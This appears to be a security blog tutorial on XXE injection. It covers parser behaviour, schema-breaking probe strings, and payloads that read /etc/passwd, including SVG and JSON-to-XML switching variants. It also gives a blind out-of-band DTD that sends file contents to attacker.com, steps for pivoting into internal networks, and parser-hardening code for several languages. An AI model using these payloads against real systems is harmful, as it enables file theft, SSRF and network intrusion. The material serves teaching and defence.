Infiltrating corporate networks using XXE injection

XML External Entity (XXE) Injection — Updated 2026

XML External Entity (XXE) Injection

DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML
XXE CWE-611 A5:2021 SSRF Blind OOB Updated 2026

Intro

External entity injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. This type of attack is well documented and known since 2002, though it continues to appear in modern applications — particularly in SOAP services, file upload handlers, and legacy enterprise integrations.

Taxonomy (2026): XXE was categorized as OWASP A4:2017 — XXE (its own dedicated category). In OWASP Top 10 2021, it was merged into A5:2021 — Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).

How the XML parser works

Based on W3C Recommendation — Extensible Markup Language (XML) 1.0, Fifth Edition

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXEs

An XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).

Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.

Attacker Crafts malicious XML <!ENTITY xxe SYSTEM ...> Vulnerable XML parser DTD processing enabled Local files file:///etc/passwd Internal services http://internal:8080 Cloud metadata 169.254.169.254 Data exfiltration In-band or OOB via external DTD Attacker receives data
Figure 1 — XXE attack flow: from malicious DTD to data exfiltration

An actual example of XXE

Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE PutMeHere [ <!ELEMENT PutMeHere ANY> <!ENTITY xxe SYSTEM "/etc/passwd"> ]> <PutMeHere>&xxe;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.

Note: The XML document is not valid if the &xxe; reference does not start with the & character and terminate with the ; character. The attack is limited to files containing text that the XML parser will allow at the place where the external entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.

Identifying XXE attack strings

The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, helping you identify the XML structures.

#PayloadPurpose
1'Single quote — break attribute values
2''Double single quote
3"Double quote — break attribute values
4""Double double quote
5<Open tag — trigger parser error
6>Close tag
7]]>CDATA end — premature closure
8]]>>Malformed CDATA end
9<!--/-->Malformed comment
10/-->Partial comment close
11-->Comment close without open
12<!--Comment open without close
13<!Incomplete declaration
14<![CDATA[ / ]]>CDATA section — bypass parsing
CDATA sections: <![CDATA[ / ]]> — CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. Characters enclosed in a CDATA section are not parsed by the XML parser.

Exploiting XXE vulnerabilities

Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.

Valid XML request

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1</username> <credentials>pass1</credentials> </user>

Example 1 — angle bracket injection

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1<</username> <credentials>pass1</credentials> </user>

Example 2 — malformed comment injection

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1<--<</username> <credentials>pass1</credentials> </user>

Example 3 — closing angle bracket

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1></username> <credentials>pass1</credentials> </user>

Example 4 — comment injection

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1<!--/--></username> <credentials>pass1</credentials> </user>

Injecting <!-- after the username causes the parser to interpret everything after it as a comment, potentially consuming the closing tag and credentials field — generating an informative error message that reveals schema structure.

Example 5 — CDATA injection

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1 <![CDATA[ / ]]> </username> <credentials>pass1</credentials> </user>

Example 6 — XSS via CDATA

<?xml version="1.0" encoding="ISO-8859-1"?> <user> <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></username> <credentials>pass1</credentials> </user>

When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.

A real attack scenario

XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.

Client request — legitimate transaction

<?xml version="1.0" encoding="ISO-8859-7"?> <appname> <header> <principal>username1</principal> <credential>userpass1</credential> </header> <fixedPaymentsDebitRequest> <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="3" referenceDate="2008-05-12" paymentDate="20-11-25"> <amount currency="EUR">100,1</amount> <transactionId>1111111</transactionId> <description>customer description</description> </fixedPayment> </fixedPaymentsDebitRequest> </appname>

Client request — with XXE injection

<?xml version="1.0" encoding="ISO-8859-7"?> <!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]> <appname> <header> <principal>username1&xxefca0a;</principal> <credential>userpass1</credential> </header> <fixedPaymentsDebitRequest> ... </fixedPaymentsDebitRequest> </appname>

The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.

Server response — file contents exfiltrated

HTTP/1.1 400 Bad Request ...error message containing... username1root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin ... jboss:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh Server: Apache/x.x (Red Hat) Content-Type: text/html;charset=ISO-8859-1
Attacker XXE payload Vulnerable web app XML parser as SSRF proxy Escalation paths Read /etc/hosts Map internal IPs Port scan http://host:PORT Fingerprint Web servers / DBs Map FW rules Egress filtering Full internal network compromise SQLi via proxy / admin panel access / DB shutdown Tools: Burp Intruder (Sniper mode) + DirBuster wordlist + fuzzdb Technique: rotate ports per host, identify egress rules from error timing
Figure 2 — XXE escalation: from file read to full internal network pivot

The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.

After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.

What can you do with a successful XXE attack

  1. Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
  2. Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
  3. Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
  4. Map firewall rules on other company extranets.
  5. DoS internal company web server machines (e.g. requesting /dev/random or recursive entity expansion — the "Billion Laughs" attack).
  6. Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
  7. Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
  8. Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
  9. Launch blind SQL injection attacks through the parser against surrounding database servers.

Modern attack vectors New 2026

Blind XXE via out-of-band (OOB) exfiltration

When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.

# Malicious payload sent to the application: <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe; ]> <root>test</root> # Contents of evil.dtd hosted on attacker.com: <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>"> %eval; %exfil;

The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.

Step 1 Attacker XXE + ext DTD ref Vulnerable parser Step 2 evil.dtd Step 3: Parser loads DTD Step 4: Parser reads local file file:///etc/hostname Content: "prod-web-01" Step 5: Exfil via HTTP callback HTTP request to attacker GET /?data=prod-web-01 → attacker.com Attacker reads data from access logs
Figure 3 — Blind XXE via out-of-band (OOB) data exfiltration

XXE via file upload

Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:

  1. SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
  2. DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
  3. SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.
# Malicious SVG file (upload as profile picture, etc.): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg xmlns="http://www.w3.org/2000/svg"> <text x="0" y="20">&xxe;</text> </svg>

Content-type switching (JSON to XML)

Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).

# Original JSON request: POST /api/login HTTP/1.1 Content-Type: application/json {"username": "admin", "password": "test"} # Switched to XML with XXE: POST /api/login HTTP/1.1 Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <username>&xxe;</username> <password>test</password> </root>

Mitigation of XXE vulnerabilities Updated

The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:

Java (DocumentBuilderFactory)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // Disable DTDs entirely (most secure) dbf.setFeature( "http://apache.org/xml/features/disallow-doctype-decl", true); // If DTDs can't be disabled, at minimum disable external entities dbf.setFeature( "http://xml.org/sax/features/external-general-entities", false); dbf.setFeature( "http://xml.org/sax/features/external-parameter-entities", false); dbf.setFeature( "http://apache.org/xml/features/nonvalidating/load-external-dtd", false); dbf.setXIncludeAware(false); dbf.setExpandEntityReferences(false);

Python (lxml / defusedxml)

# Use defusedxml — drop-in replacement that blocks XXE by default import defusedxml.ElementTree as ET tree = ET.parse('input.xml') # Or with lxml, disable network access and entity resolution from lxml import etree parser = etree.XMLParser( resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False )

.NET (XmlReaderSettings)

XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit; settings.XmlResolver = null; XmlReader reader = XmlReader.Create(stream, settings);

PHP (libxml)

// Disable entity loading before any XML parsing libxml_disable_entity_loader(true); // For SimpleXML: $xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_NONET);
Important: libxml_disable_entity_loader() is deprecated in PHP 8.0+ because libxml2 >= 2.9.0 disables external entity loading by default. However, always verify your specific PHP and libxml2 versions — older deployments may still be vulnerable.

General hardening principles

  1. Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
  2. Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
  3. Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
  4. Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
  5. Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
  6. Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.

Summary

When an application is vulnerable to XXE, the attacker may be capable of gaining access to the web server OS file system, causing DoS attacks (via /dev/random or recursive entity expansion), performing SSRF against internal services, exfiltrating data via out-of-band channels, or even achieving XSS through XML-to-HTML reflection. Modern XXE often comes through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.


Popular posts from this blog

PHP Source Code Chunks of Insanity (Delete Post Pages) Part 4

The Hackers Guide To Dismantling IPhone (Part 3)

MSSQL Injection OPENROWSET Side Channel